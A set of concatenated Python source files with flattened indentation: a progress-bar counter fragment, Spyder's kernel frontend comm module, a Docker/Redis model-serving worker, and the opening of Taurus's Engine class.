self.data = data
self.items_completed = 0
self.label = label
self.remove_when_done = remove_when_done
self._done = False
self.total: Optional[int]
if total is None:
try:
self.total = len(cast(Sized, data))
except TypeError:
self.total = None # We don't know the total length.
else:
self.total = total
def __iter__(self) -> Iterable[_CounterItem]:
try:
if self.data is not None:
for item in self.data:
yield item
self.item_completed()
finally:
self.done = True
def item_completed(self) -> None:
"""
Start handling the next item.
(Can be called manually in case we don't have a collection to loop through.)
"""
self.items_completed += 1
self.progress_bar.invalidate()
@property
def done(self) -> bool:
return self._done
@done.setter
def done(self, value: bool) -> None:
self._done = value
if value and self.remove_when_done:
self.progress_bar.counters.remove(self)
@property
def percentage(self) -> float:
if self.total is None:
return 0
else:
return self.items_completed * 100 / max(self.total, 1)
@property
def time_elapsed(self) -> datetime.timedelta:
"""
return how much time has been elapsed since the start.
"""
return datetime.datetime.now() - self.start_time
@property
def time_left(self) -> Optional[datetime.timedelta]:
"""
Timedelta representing the time left.
"""
if self.total is None or not self.percentage:
return None
else:
return self.time_elapsed * (100 - self.percentage) / self.percentage
|
frontendcomm.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
In addition to the remote_call mechanism implemented in CommBase:
- Implements _wait_reply, so blocking calls can be made.
"""
import pickle
import socket
import sys
import threading
import time
import ipykernel
from IPython.core.getipython import get_ipython
from jupyter_client.localinterfaces import localhost
from tornado import ioloop
import zmq
from spyder_kernels.comms.commbase import CommBase, CommError
from spyder_kernels.py3compat import TimeoutError, PY2
def get_free_port():
"""Find a free port on the local machine."""
sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, b'\0' * 8)
sock.bind((localhost(), 0))
port = sock.getsockname()[1]
sock.close()
return port
def frontend_request(blocking=True, timeout=None):
"""
Send a request to the frontend.
If blocking is True, The return value will be returned.
"""
if not get_ipython().kernel.frontend_comm.is_open():
raise CommError("Can't make a request to a closed comm")
# Get a reply from the last frontend to have sent a message
return get_ipython().kernel.frontend_call(
blocking=blocking,
broadcast=False,
timeout=timeout)
class FrontendComm(CommBase):
"""Mixin to implement the spyder_shell_api."""
def __init__(self, kernel):
super(FrontendComm, self).__init__()
# Comms
self.kernel = kernel
self.kernel.comm_manager.register_target(
self._comm_name, self._comm_open)
self.comm_port = None
self.register_call_handler('_send_comm_config',
self._send_comm_config)
self.comm_lock = threading.Lock()
# self.kernel.parent is IPKernelApp unless we are in tests
if self.kernel.parent:
# Create a new socket
self.context = zmq.Context()
self.comm_socket = self.context.socket(zmq.ROUTER)
self.comm_socket.linger = 1000
self.comm_port = get_free_port()
self.comm_port = self.kernel.parent._bind_socket(
self.comm_socket, self.comm_port)
if hasattr(zmq, 'ROUTER_HANDOVER'):
# Set router-handover to workaround zeromq reconnect problems
# in certain rare circumstances.
# See ipython/ipykernel#270 and zeromq/libzmq#2892
self.comm_socket.router_handover = 1
self.comm_thread_close = threading.Event()
self.comm_socket_thread = threading.Thread(target=self.poll_thread)
self.comm_socket_thread.start()
# Patch parent.close . This function only exists in Python 3.
if not PY2:
parent_close = self.kernel.parent.close
def close():
"""Close comm_socket_thread."""
self.close_thread()
parent_close()
self.kernel.parent.close = close
def close(self, comm_id=None):
"""Close the comm and notify the other side."""
with self.comm_lock:
return super(FrontendComm, self).close(comm_id)
def _send_message(self, *args, **kwargs):
"""Publish custom messages to the other side."""
with self.comm_lock:
return super(FrontendComm, self)._send_message(*args, **kwargs)
def close_thread(self):
"""Close comm."""
self.comm_thread_close.set()
self.comm_socket.close()
self.context.term()
self.comm_socket_thread.join()
def poll_thread(self):
"""Receive messages from comm socket."""
if not PY2:
# Create an event loop for the handlers.
ioloop.IOLoop().initialize()
while not self.comm_thread_close.is_set():
self.poll_one()
def poll_one(self):
"""Receive one message from comm socket."""
out_stream = None
if self.kernel.shell_streams:
# If the message handler needs to send a reply,
# use the regular shell stream.
out_stream = self.kernel.shell_streams[0]
try:
ident, msg = self.kernel.session.recv(self.comm_socket, 0)
except zmq.error.ContextTerminated:
return
except Exception:
self.kernel.log.warning("Invalid Message:", exc_info=True)
return
msg_type = msg['header']['msg_type']
if msg_type == 'shutdown_request':
self.comm_thread_close.set()
self._comm_close(msg)
return
handler = self.kernel.shell_handlers.get(msg_type, None)
if handler is None:
self.kernel.log.warning("Unknown message type: %r", msg_type)
else:
try:
if not PY2:
import asyncio
if (not getattr(asyncio, 'run', False) or
ipykernel.__version__[0] < '6'):
# This is required for Python 3.6, which doesn't have
# asyncio.run or ipykernel versions less than 6. The
# nice thing is that ipykernel 6, which requires
# asyncio, doesn't support Python 3.6.
handler(out_stream, ident, msg)
else:
# This is needed for ipykernel 6+
asyncio.run(handler(out_stream, ident, msg))
else:
handler(out_stream, ident, msg)
except ValueError as e:
# This avoids showing an unnecessary message about expected
# coroutines.
return
except Exception:
self.kernel.log.error("Exception in message handler:",
exc_info=True)
return
sys.stdout.flush()
sys.stderr.flush()
# Flush to ensure reply is sent
if out_stream:
out_stream.flush(zmq.POLLOUT)
def remote_call(self, comm_id=None, blocking=False, callback=None,
timeout=None):
"""Get a handler for remote calls."""
return super(FrontendComm, self).remote_call(
blocking=blocking,
comm_id=comm_id,
callback=callback,
timeout=timeout)
def wait_until(self, condition, timeout=None):
"""Wait until condition is met. Returns False if timeout."""
if condition():
return True
t_start = time.time()
while not condition():
if timeout is not None and time.time() > t_start + timeout:
return False
if threading.current_thread() is self.comm_socket_thread:
# Wait for a reply on the comm channel.
self.poll_one()
else:
# Wait 10ms for a reply
time.sleep(0.01)
return True
# --- Private --------
def _wait_reply(self, call_id, call_name, timeout, retry=True):
"""Wait until the frontend replies to a request."""
def reply_received():
"""The reply is there!"""
return call_id in self._reply_inbox
if not self.wait_until(reply_received):
if retry:
self._wait_reply(call_id, call_name, timeout, False)
return
raise TimeoutError(
"Timeout while waiting for '{}' reply.".format(
call_name))
def _comm_open(self, comm, msg):
"""
A new comm is open!
"""
self.calling_comm_id = comm.comm_id
self._register_comm(comm)
self._set_pickle_protocol(msg['content']['data']['pickle_protocol'])
self._send_comm_config()
def on_outgoing_call(self, call_dict):
"""A message is about to be sent"""
call_dict["comm_port"] = self.comm_port
return super(FrontendComm, self).on_outgoing_call(call_dict)
def _send_comm_config(self):
"""Send the comm config to the frontend."""
self.remote_call()._set_comm_port(self.comm_port)
self.remote_call()._set_pickle_protocol(pickle.HIGHEST_PROTOCOL)
def _comm_close(self, msg):
"""Close comm."""
comm_id = msg['content']['comm_id']
# Send back a close message confirmation
# Fixes spyder-ide/spyder#15356
self.close(comm_id)
def _async_error(self, error_wrapper):
"""
Send an async error back to the frontend to be displayed.
"""
self.remote_call()._async_error(error_wrapper)
def _register_comm(self, comm):
"""
Remove side effect ipykernel has.
"""
def handle_msg(msg):
"""Handle a comm_msg message"""
if comm._msg_callback:
comm._msg_callback(msg)
comm.handle_msg = handle_msg
super(FrontendComm, self)._register_comm(comm)
def _remote_callback(self, call_name, call_args, call_kwargs):
"""Call the callback function for the remote call."""
saved_stdout_write = sys.stdout.write
saved_stderr_write = sys.stderr.write
sys.stdout.write = WriteWrapper(saved_stdout_write, call_name)
sys.stderr.write = WriteWrapper(saved_stderr_write, call_name)
try:
return super(FrontendComm, self)._remote_callback(
call_name, call_args, call_kwargs)
finally:
sys.stdout.write = saved_stdout_write
sys.stderr.write = saved_stderr_write
class WriteWrapper():
"""Wrapper to warn user when text is printed."""
def __init__(self, write, name):
self._write = write
self._name = name
self._warning_shown = False
def __call__(self, string):
"""Print warning once."""
if not self._warning_shown:
self._warning_shown = True
self._write(
"\nOutput from spyder call "
+ repr(self._name) + ":\n")
return self._write(string)
|
worker_measurements.py
|
#!env python
import argparse
import docker
import time
import socket
import platform
import enum
import threading
from threading import Event
import queue
#from queue import Queue
import functools
import redis
from redis import Redis
import signal
# My imports
import exceptions
from worker_interface import WorkerServer
import models
import logging
import os
import common
NETWORK_NAME = "worker_network"
class DataBase(object):
def __init__(self, redis_server="redis-server", redis_port=6379, testing=False):
self.testing = testing
if not self.testing:
self.db = Redis(host=redis_server, port=redis_port)
logging.debug("Trying to connect to redis server")
try:
self.db.ping()
except redis.exceptions.ConnectionError as e:
logging.critical(f"Error connecting to Redis server @ {redis_server}. Is it started?")
logging.critical(e)
exit(8)
logging.debug("Connected to redis")
else:
self.db = None
def smembers(self, s):
if self.testing:
return ["resnet50_netdef_a", "resnet50_netdef_b", "resnet50_netdef_c"]
else:
return self.db.smembers(s)
def get(self, s):
if self.testing:
return 0.1 # sso
else:
return self.db.get(s)
def set(self, *args, **kwargs):
if self.testing:
pass
else:
return self.db.set(*args, **kwargs)
def pipeline(self):
return self.db.pipeline()
@functools.total_ordering
class WorkerEvent(Event):
def __init__(self, model_name, is_model_change, func, args=[], kwargs={}):
super().__init__()
self.model_name = model_name
self.is_model_change = is_model_change
self.enqueue_time = time.time()
self.execution_start_time = None
self.execution_end_time = None
self.func = func
self.args = args if type(args) is list else [args]
self.kwargs = kwargs
self.response = None
def executeInThread(self):
threading.Thread(target=self.execute).run()
def execute(self):
logging.debug("Starting Execution")
self.execution_start_time = time.time()
self.response = self.func(*self.args, **self.kwargs)
self.execution_end_time = time.time()
logging.debug(f"Execution Complete: {self.response}")
self.set()
return self.response
def __repr__(self):
return f"WorkerEvent<{self.func}, {self.enqueue_time}>"
# For ordering in priority queue
def __eq__(self, other):
return self.enqueue_time == other.enqueue_time
def __lt__(self, other):
return self.enqueue_time < other.enqueue_time
class Worker(object):
def __init__(self, flags, redis_server, redis_port, model_repo_path, host_repo_path, container_id, worker_name=None, dummy_load=True, *args, **kwargs):
self.flags = flags
# Set Up Redis database connection
self.db = DataBase(redis_server, redis_port, flags.testing)
# Set up docker connection
## Note, we might push this to be model controlled, but it is pretty integrated. Hmm
logging.debug("Connecting to docker")
try:
self.docker_client = docker.from_env()
except FileNotFoundError as e:
logging.critical("Cannot find docker file. Is it running?")
logging.critical(e)
exit(8)
logging.debug("Connected to docker")
# For labeling network and workers
self.container_id = container_id
self.container = self.docker_client.containers.get(self.container_id)
self.container_prefix = self.container_id[:5]
self.network_name = f"{self.container_prefix}-{NETWORK_NAME}"
self.network = self.docker_client.networks.create(name=f"{self.network_name}", internal=False, check_duplicate=True)
self.network.connect(self.container)
# For reporting metrics
self.worker_name = worker_name
# Model Path information
self.host_repo_path = host_repo_path # To pass to individual models
#self.model_repo_path = model_repo_path # To know what models are available
self.models_in_repo = os.listdir(model_repo_path) # Available models
self.dummy_load = dummy_load
self.max_concurrent_execs = flags.max_concurrent_execs
self.num_concurrent_execs = 0
self.current_execution_list = []
# Set up models
if self.dummy_load:
logging.debug("Using Dummy models")
Model = models.DummyModel
self.models_in_repo = [w.decode() for w in self.db.smembers(f"{common.MODEL_NAME_KEY}")]
logging.info(f"self.models_in_repo: {self.models_in_repo}")
else:
logging.debug("Using Real models")
Model = models.TFSServerModel
models.TFSServerModel.initServer(self.docker_client, self.host_repo_path, flags.worker_memory, self.network_name, arm=flags.use_arm)
common.getModelInfo(self.db)
logging.info(f"Running with {Model}")
self.models_by_name = {
model_name : Model(model_name, os.path.join(self.host_repo_path, model_name), self.docker_client, self.network_name, self.container_prefix)
for model_name in self.models_in_repo
}
self.metrics = common.Metrics(self.db, f"{common.WORKER_STAT_PREFIX}{self.worker_name}", ["requests_submitted", "requests_completed", "open_requests", "model_loads", "model_unloads"])
self.event_queue = queue.PriorityQueue()
self.processing_thread = threading.Thread(target=self.processEventQueue)
self.processing_thread.start()
self._unused_queue = queue.PriorityQueue()
def processEventQueue(self):
while True:
# (sso) TODO: uncomment the below line
#self.getStatistics()
event = self.event_queue.get()
# Check to see if event changes the models in memory
if not event.is_model_change:
# Check to see if request could potentially be serviced
if not self.models_by_name[event.model_name].isAvailable():
self._unused_queue.put(event)
continue
time_start = time.time()
event.execute()
#event.set()
# (sso) TODO: maybe only update after model loads/unloads?
def processEventQueue_new(self):
while True:
event = self.event_queue.get()
# Check if event is serviceable
if (not event.is_model_change) and (not self.models_by_name[event.model_name].isAvailable()):
# If not, then put in the unused queue to be mixed back in after model load
self._unused_queue.put(event)
continue
# We know that the event can be executed
logging.debug(f"Next Event: {event.func.__name__}")
event.executeInThread()
self.current_execution_list.append(event)
while len(self.current_execution_list) == self.max_concurrent_execs:
# Loop until some of the executions decrease in number
## That is, just stay here until something completes
self.current_execution_list = list(filter((lambda r: not r.is_set()), self.current_execution_list))
# Finally updated redis stats
self.updateRedisModelStats()
def stopWorker(self):
logging.debug("Stopping Worker")
for model in self.models_by_name.values():
model.shutdown(shutdown=True)
self.network.disconnect(self.container)
self.network.remove()
sys.exit(0)
def getStatistics(self):
stats_by_model = {
model_name : model.getStatistics()
for model_name, model in self.models_by_name.items()
}
return stats_by_model
########################
## External Functions ##
########################
@common.timing
def loadModel(self, model_name, *args, **kwargs):
logging.info(f"loadModel() requested for {model_name}")
if model_name not in self.models_by_name:
raise exceptions.ModelNotInRepoException("Model not available in model repository")
if not self._isThereFreeSpaceToLoad(model_name):
# TODO: with queued loading/unloading, this becomes more complicated
raise exceptions.NotEnoughFreeSpace("Not enough free space to load model")
load_event = WorkerEvent(model_name, is_model_change=True, func=self._loadModel, args=[model_name])
self.event_queue.put(load_event)
self.recordModelLoad(model_name)
@common.timing
def unloadModel(self, model_name, *args, **kwargs):
logging.info(f"unloadModel() requested for {model_name}")
if model_name not in self.models_by_name:
raise exceptions.ModelNotInRepoException("Model not available in model repository")
unload_event = WorkerEvent(model_name, is_model_change=True, func=self._unloadModel, args=[model_name])
self.event_queue.put(unload_event)
self.recordModelUnload(model_name)
@common.timing
def requestInference(self, inference_request, *args, **kwargs):
logging.info(f"requestInference() for model '{inference_request.model_name}'")
logging.info(f"request '{inference_request}'")
self.recordRequestEntry(inference_request.model_name)
inference_request.markAssignment()
logging.debug(f"Assigning: {inference_request}")
infer_event = WorkerEvent(inference_request.model_name,
is_model_change=False,
func=self.models_by_name[inference_request.model_name].runInference,
args=[inference_request])
self.event_queue.put(infer_event)
logging.debug(f"Waiting: {inference_request}")
infer_event.wait(common.TIMEOUT_IN_SECONDS)
self.recordRequestExit(inference_request.model_name)
if infer_event.response is None:
raise exceptions.ModelInferenceException(f"Inference model ({model_name}) did not respond")
return infer_event.response
########################
########################
####################
## Core Functions ##
####################
@common.timing
def _loadModel(self, model_name):
model_stats = self.getModelInformation(model_name)
self.models_by_name[model_name].startModel(model_stats)
while not self._unused_queue.empty():
self.event_queue.put(self._unused_queue.get())
@common.timing
def _unloadModel(self, model_name):
self.models_by_name[model_name].stopModel()
####################
####################
#############################
## Informational Functions ##
#############################
def _isThereFreeSpaceToLoad(self, model_name, *args, **kwargs):
return True
if self.dummy_load:
return True
else:
running_models = [m for m in self.models_by_name.values() if m.isAvailable()]
logging.debug(running_models)
logging.info(f"Free space: {self.flags.worker_memory - sum([m.getModelSize() for m in running_models])}")
logging.info(f"Space needed: {self.models_by_name[model_name].getModelSize()}")
return (sum([m.getModelSize() for m in running_models]) + self.models_by_name[model_name].getModelSize() )<= self.flags.worker_memory
#############################
#############################
########################
## Redis interactions ##
########################
def getModelInformation(self, model_name, *args, **kwargs):
expected_exec_latency = self.db.get(f"{common.MODEL_STAT_PREFIX}{model_name}{common.DB_FIELD_SEPARATOR}avg_exec_latency")
expected_load_latency = self.db.get(f"{common.MODEL_STAT_PREFIX}{model_name}{common.DB_FIELD_SEPARATOR}avg_load_latency")
expected_unload_latency = self.db.get(f"{common.MODEL_STAT_PREFIX}{model_name}{common.DB_FIELD_SEPARATOR}avg_unload_latency")
loaded_size = self.db.get(f"{common.MODEL_STAT_PREFIX}{model_name}{common.DB_FIELD_SEPARATOR}loaded_size")
model_stats = {
"expected_exec_latency" : common.DUMMY_EXEC_LATENCY if expected_exec_latency is None else float(expected_exec_latency.decode()),
"expected_load_latency" : common.DUMMY_LOAD_LATENCY if expected_load_latency is None else float(expected_load_latency.decode()),
"expected_unload_latency" : common.DUMMY_UNLOAD_LATENCY if expected_unload_latency is None else float(expected_unload_latency.decode()),
"loaded_size" : 0 if loaded_size is None else float(loaded_size.decode()),
}
return model_stats
def updateRedisModelStats(self):
if not self.flags.update_redis:
return
logging.info(f"updateRedisModelStats()")
pipe = self.db.pipeline()
for model_name, model in self.models_by_name.items():
for stat_name, stat in model.getStatistics().items():
#logging.debug(f"{model_name}:{stat_name} : {stat}")
pipe.set( f"{common.MODEL_STAT_PREFIX}{model_name}{common.DB_FIELD_SEPARATOR}{stat_name}", stat )
results = pipe.execute()
return results
########################
########################
#################################
## Metrics recording Functions ##
def recordRequestEntry(self, model_requested):
self.metrics.incrementMetricBy("requests_submitted", model_requested)
self.metrics.incrementMetricBy("open_requests", model_requested, +1)
def recordRequestExit(self, model_requested):
logging.info(f"recordRequestExit({model_requested})")
self.metrics.incrementMetricBy("requests_completed", model_requested)
self.metrics.incrementMetricBy("open_requests", model_requested, -1)
def recordModelLoad(self, model_requested):
self.metrics.incrementMetricBy("model_loads", model_requested)
def recordModelUnload(self, model_requested):
self.metrics.incrementMetricBy("model_unloads", model_requested)
#################################
def getParser(add_help=True, include_parents=True):
parser = argparse.ArgumentParser(add_help=add_help,
parents=([common.getParser(add_help=False)] if include_parents else [])
)
parser.add_argument('--model_repo_path', default="/tmp/models",
help='Path to model repo')
parser.add_argument('--real_model_repo_path', default="/Users/ssogden/research/2020-project-EdgeController/triton-inference-server/docs/examples/model_repository.limited",
help='Path to model repo')
parser.add_argument('--running_in_docker', action="store_true",
help="Setting to help system determine if running within docker.")
parser.add_argument('--worker_name',
help="Name of worker")
parser.add_argument('--use_arm', action="store_true")
parser.add_argument('--testing', action="store_true")
parser.add_argument('--update_redis', action="store_true")
parser.add_argument('--max_concurrent_execs', default=1, type=int, help="Number of concurrent executions that can be started")
return parser
def main():
flags = getParser().parse_args()
flags.use_arm = (platform.processor() == 'arm64')
common.getLogger() #f"{os.path.basename(__file__).replace('.py', '')}")
# we can assume we are running in Docker basically
container_id = socket.gethostname()
logging.debug(f"container_id: {container_id}")
worker = Worker(flags,
flags.redis_server,
flags.redis_port,
flags.model_repo_path,
host_repo_path=(flags.real_model_repo_path if flags.running_in_docker else flags.model_repo_path),
container_id=container_id,
worker_name=flags.worker_name,
dummy_load=flags.dummy_load)
signal.signal(signal.SIGTERM, worker.stopWorker)
logging.info("Worker set up. Beginning serving gRPC")
worker_server = WorkerServer.serve(worker)
logging.info("Finished serving, wrapping up")
worker.stopWorker()
if __name__ == '__main__':
main()
|
engine.py
|
"""
Main BZT classes
Copyright 2015 BlazeMeter Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import codecs
import copy
import datetime
import json
import logging
import os
import pkgutil
import re
import shutil
import sys
import threading
import time
import traceback
import uuid
from distutils.version import LooseVersion
import bzt
from bzt import ManualShutdown, get_configs_dir, TaurusConfigError, TaurusInternalException
from bzt.six import string_types, text_type, parse, reraise
from bzt.utils import load_class, BetterDict, ensure_is_dict, dehumanize_time, is_windows, is_linux
from bzt.utils import shell_exec, get_full_path, ExceptionalDownloader, get_uniq_name, HTTPClient, Environment
from .dicts import Configuration
from .modules import Provisioning, Reporter, Service, Aggregator, EngineModule
from .names import EXEC, TAURUS_ARTIFACTS_DIR, SETTINGS
from .templates import Singletone
class Engine(object):
"""
Core entity of the technology, used to coordinate whole process
:type reporters: list[Reporter]
:type services: list[Service]EXEC
:type log: logging.Logger
:type aggregator: bzt.modules.aggregator.ConsolidatingAggregator
:type stopping_reason: BaseException
"""
ARTIFACTS_DIR = "%Y-%m-%d_%H-%M-%S.%f"
def __init__(self, parent_logger):
"""
:type parent_logger: logging.Logger
"""
self.file_search_paths = []
self.services = []
self.__artifacts = []
self.reporters = []
self.artifacts_dir = None
self.log = parent_logger.getChild(self.__class__.__name__)
self.env = Environment(self.log) # backward compatibility
self.shared_env = Environment(self.log) # backward compatibility
self.config = Configuration()
self.config.log = self.log.getChild(Configuration.__name__)
self.modules = {} # available modules
self.provisioning = Provisioning()
self.aggregator = Aggregator(is_functional=False)
self.aggregator.engine = self
self.interrupted = False
self.check_interval = 1
self.stopping_reason = None
self.engine_loop_utilization = 0
self.prepared = []
self.started = []
self.default_cwd = None
self.logging_level_down = lambda: None
self.logging_level_up = lambda: None
self._http_client = None
def configure(self, user_configs, read_config_files=True):
"""
Load configuration files
:type user_configs: list[str]
:type read_config_files: bool
"""
self.log.info("Configuring...")
if read_config_files:
self._load_base_configs()
merged_config = self._load_user_configs(user_configs)
all_includes = []
while "included-configs" in self.config:
includes = self.config.pop("included-configs")
included_configs = [self.find_file(conf) for conf in includes if conf not in all_includes + user_configs]
all_includes += includes
self.config.load(included_configs)
self.config['included-configs'] = all_includes
self.config.merge({"version": bzt.VERSION})
self.get_http_client()
if self.config.get(SETTINGS).get("check-updates", True):
install_id = self.config.get("install-id", self._generate_id())
def wrapper():
return self._check_updates(install_id)
thread = threading.Thread(target=wrapper) # intentionally non-daemon thread
thread.start()
return merged_config
def unify_config(self):
executions = self.config.get(EXEC, [])
if isinstance(executions, dict):
executions = [executions]
self.config[EXEC] = executions
settings = self.config.get(SETTINGS)
default_executor = settings.get("default-executor", None)
prov_type = self.config.get(Provisioning.PROV)
for execution in executions: # type: BetterDict
executor = execution.get("executor", default_executor, force_set=True)
if not executor:
msg = "Cannot determine executor type and no default executor in %s"
raise TaurusConfigError(msg % execution)
reporting = self.config.get(Reporter.REP, [])
for index in range(len(reporting)):
ensure_is_dict(reporting, index, "module")
services = self.config.get(Service.SERV, [])
for index in range(len(services)):
ensure_is_dict(services, index, "module")
modules = self.config.get("modules")
for module in modules:
ensure_is_dict(modules, module, "class")
@staticmethod
def _generate_id():
if os.getenv("JENKINS_HOME"):
prefix = "jenkins"
elif os.getenv("TRAVIS"):
prefix = "travis"
elif any([key.startswith("bamboo") for key in os.environ.keys()]):
prefix = "bamboo"
elif os.getenv("TEAMCITY_VERSION"):
prefix = "teamcity"
elif os.getenv("DOCKER_HOST"):
prefix = "docker"
elif os.getenv("AWS_"):
prefix = "amazon"
elif os.getenv("GOOGLE_APPLICATION_CREDENTIALS") or os.getenv("CLOUDSDK_CONFIG"):
prefix = "google_cloud"
elif os.getenv("WEBJOBS_NAME"):
prefix = "azure"
elif is_linux():
prefix = 'linux'
elif is_windows():
prefix = 'windows'
else:
prefix = 'macos'
return "%s-%x" % (prefix, uuid.getnode())
def prepare(self):
"""
Prepare engine for work, will call preparing of Provisioning and add
downstream EngineModule instances
"""
self.log.info("Preparing...")
self.unify_config()
interval = self.config.get(SETTINGS).get("check-interval", self.check_interval)
self.check_interval = dehumanize_time(interval)
try:
self.__prepare_aggregator()
self.__prepare_services()
self.__prepare_provisioning()
self.__prepare_reporters()
self.config.dump()
except BaseException as exc:
self.stopping_reason = exc
raise
def _startup(self):
modules = self.services + [self.aggregator] + self.reporters + [self.provisioning] # order matters
for module in modules:
self.log.debug("Startup %s", module)
self.started.append(module)
module.startup()
self.config.dump()
def start_subprocess(self, args, env, cwd=None, **kwargs):
if cwd is None:
cwd = self.default_cwd
return shell_exec(args, cwd=cwd, env=env.get(), **kwargs)
def run(self):
"""
Run the job. Calls `startup`, does periodic `check`,
calls `shutdown` in any case
"""
self.log.info("Starting...")
exc_info = exc_value = None
try:
self._startup()
self.logging_level_down()
self._wait()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
exc_value = exc
exc_info = sys.exc_info()
finally:
self.log.warning("Please wait for graceful shutdown...")
try:
self.logging_level_up()
self._shutdown()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
if exc_value:
reraise(exc_info, exc_value)
def _check_modules_list(self):
stop = False
modules = [self.provisioning, self.aggregator] + self.services + self.reporters # order matters
for module in modules:
if module in self.started:
self.log.debug("Checking %s", module)
finished = bool(module.check())
if finished:
self.log.debug("%s finished", module)
stop = finished
return stop
def _wait(self):
"""
Wait modules for finish
:return:
"""
prev = time.time()
while not self._check_modules_list():
now = time.time()
diff = now - prev
delay = self.check_interval - diff
self.engine_loop_utilization = diff / self.check_interval
self.log.debug("Iteration took %.3f sec, sleeping for %.3f sec...", diff, delay)
if delay > 0:
time.sleep(delay)
prev = time.time()
if self.interrupted:
raise ManualShutdown()
self.config.dump()
def _shutdown(self):
"""
Shutdown modules
:return:
"""
self.log.info("Shutting down...")
self.log.debug("Current stop reason: %s", self.stopping_reason)
exc_info = exc_value = None
modules = [self.provisioning, self.aggregator] + self.reporters + self.services # order matters
for module in modules:
try:
if module in self.started:
module.shutdown()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
self.config.dump()
if exc_value:
reraise(exc_info, exc_value)
def post_process(self):
"""
Do post-run analysis and processing for the results.
"""
self.log.info("Post-processing...")
# :type exception: BaseException
exc_info = exc_value = None
modules = [self.provisioning, self.aggregator] + self.reporters + self.services # order matters
# services are last because of shellexec which is "final-final" action
for module in modules:
if module in self.prepared:
try:
module.post_process()
except BaseException as exc:
if isinstance(exc, KeyboardInterrupt):
self.log.debug("post_process: %s", exc)
else:
self.log.debug("post_process: %s\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
self.config.dump()
if exc_info:
reraise(exc_info, exc_value)
def create_artifact(self, prefix, suffix):
"""
Create new artifact in artifacts dir with given prefix and suffix
:type prefix: str
:type suffix: str
:return: Path to created file
:rtype: str
:raise TaurusInternalException: if no artifacts dir set
"""
if not self.artifacts_dir:
raise TaurusInternalException("Cannot create artifact: no artifacts_dir set up")
filename = get_uniq_name(self.artifacts_dir, prefix, suffix, self.__artifacts)
self.__artifacts.append(filename)
self.log.debug("New artifact filename: %s", filename)
return filename
def existing_artifact(self, filename, move=False, target_filename=None):
"""
Add existing artifact, it will be collected into artifact_dir. If
move=True, the original file will be deleted
:type filename: str
:type move: bool
:type target_filename: str
"""
self.log.debug("Add existing artifact (move=%s): %s", move, filename)
if self.artifacts_dir is None:
self.log.warning("Artifacts dir has not been set, will not copy %s", filename)
return
new_filename = os.path.basename(filename) if target_filename is None else target_filename
new_name = os.path.join(self.artifacts_dir, new_filename)
self.__artifacts.append(new_name)
if get_full_path(filename) == get_full_path(new_name):
self.log.debug("No need to copy %s", filename)
return
if not os.path.exists(filename):
self.log.warning("Artifact file not exists: %s", filename)
return
if move:
self.log.debug("Moving %s to %s", filename, new_name)
shutil.move(filename, new_name)
else:
self.log.debug("Copying %s to %s", filename, new_name)
shutil.copy(filename, new_name)
def create_artifacts_dir(self, existing_artifacts=(), merged_config=None):
"""
Create directory for artifacts, directory name based on datetime.now()
"""
if not self.artifacts_dir:
artifacts_dir = self.config.get(SETTINGS, force_set=True).get("artifacts-dir", self.ARTIFACTS_DIR)
self.artifacts_dir = datetime.datetime.now().strftime(artifacts_dir)
self.artifacts_dir = get_full_path(self.artifacts_dir)
self.log.info("Artifacts dir: %s", self.artifacts_dir)
os.environ[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir
if not os.path.isdir(self.artifacts_dir):
os.makedirs(self.artifacts_dir)
# dump current effective configuration
dump = self.create_artifact("effective", "") # TODO: not good since this file not exists
self.config.set_dump_file(dump)
self.config.dump()
# dump merged configuration
if merged_config:
merged_config.dump(self.create_artifact("merged", ".yml"), Configuration.YAML)
merged_config.dump(self.create_artifact("merged", ".json"), Configuration.JSON)
for artifact in existing_artifacts:
self.existing_artifact(artifact)
def is_functional_mode(self):
return self.aggregator is not None and self.aggregator.is_functional
def __load_module(self, alias):
"""
Load module class by alias
:param alias: str
:return: class
"""
if alias in self.modules:
return self.modules[alias]
mod_conf = self.config.get('modules')
if alias not in mod_conf:
msg = "Module '%s' not found in list of available aliases %s" % (alias, sorted(mod_conf.keys()))
raise TaurusConfigError(msg)
settings = ensure_is_dict(mod_conf, alias, "class")
acopy = copy.deepcopy(settings)
BetterDict.traverse(acopy, Configuration.masq_sensitive)
self.log.debug("Module config: %s %s", alias, acopy)
err = TaurusConfigError("Class name for alias '%s' is not found in module settings: %s" % (alias, settings))
clsname = settings.get('class', err)
self.modules[alias] = load_class(clsname)
if not issubclass(self.modules[alias], EngineModule):
raise TaurusInternalException("Module class does not inherit from EngineModule: %s" % clsname)
return self.modules[alias]
def instantiate_module(self, alias):
"""
Create new instance for module using its alias from module settings
section of config. Thus, to instantiate module it should be mentioned
in settings.
:type alias: str
:rtype: EngineModule
"""
classobj = self.__load_module(alias)
instance = classobj()
assert isinstance(instance, EngineModule)
instance.log = self.log.getChild(alias)
instance.engine = self
settings = self.config.get("modules")
instance.settings = settings.get(alias)
return instance
def find_file(self, filename):
"""
Try to find file or dir in search_path if it was specified. Helps finding files
in non-CLI environments or relative to config path
Return path is full and mustn't treat with abspath/etc.
:param filename: file basename to find
:type filename: str
"""
if not filename:
return filename
if filename.lower().startswith("http://") or filename.lower().startswith("https://"):
parsed_url = parse.urlparse(filename)
downloader = ExceptionalDownloader(self.get_http_client())
self.log.info("Downloading %s", filename)
tmp_f_name, headers = downloader.get(filename)
cd_header = headers.get('Content-Disposition', '')
dest = cd_header.split('filename=')[-1] if cd_header and 'filename=' in cd_header else ''
